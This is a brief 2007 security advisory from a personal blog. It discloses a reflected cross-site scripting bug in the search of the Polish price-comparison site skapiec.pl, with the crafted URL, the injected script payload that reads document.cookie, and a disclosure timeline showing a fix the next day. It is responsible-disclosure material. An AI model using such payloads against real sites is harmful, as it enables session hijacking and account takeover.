Zapraszam na bloga o botnetach i złośliwym oprogramowaniu: bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net

+ Subject:
XSS bug for www.skapiec.pl

+ Version:
2007.05.22

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ skapiec.pl Description:
Comparison price in 500 internet shops.

+ Description:
XSS IN:
http://www.skapiec.pl/site/szukaj/?sz=&szukaj=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&dzial=-1&x=38&y=15

Sent data:
"><script>alert(document.cookie);</script>

That is a possibility to take over an user account from http://skapiec.pl, when the logged user would click at specially crafted URL.



Timeline:
2007.05.22 bug discovered
2007.05.22 bug sent via mail from http://www.skapiec.pl/site/doc/1 [uwagi]
2007.05.23 fixed and fast answer via e-mail

Original Advisory: http://kaneda.bohater.net/security/20070522-xss-skapiec.pl.php

Check my other bugs in security section: Security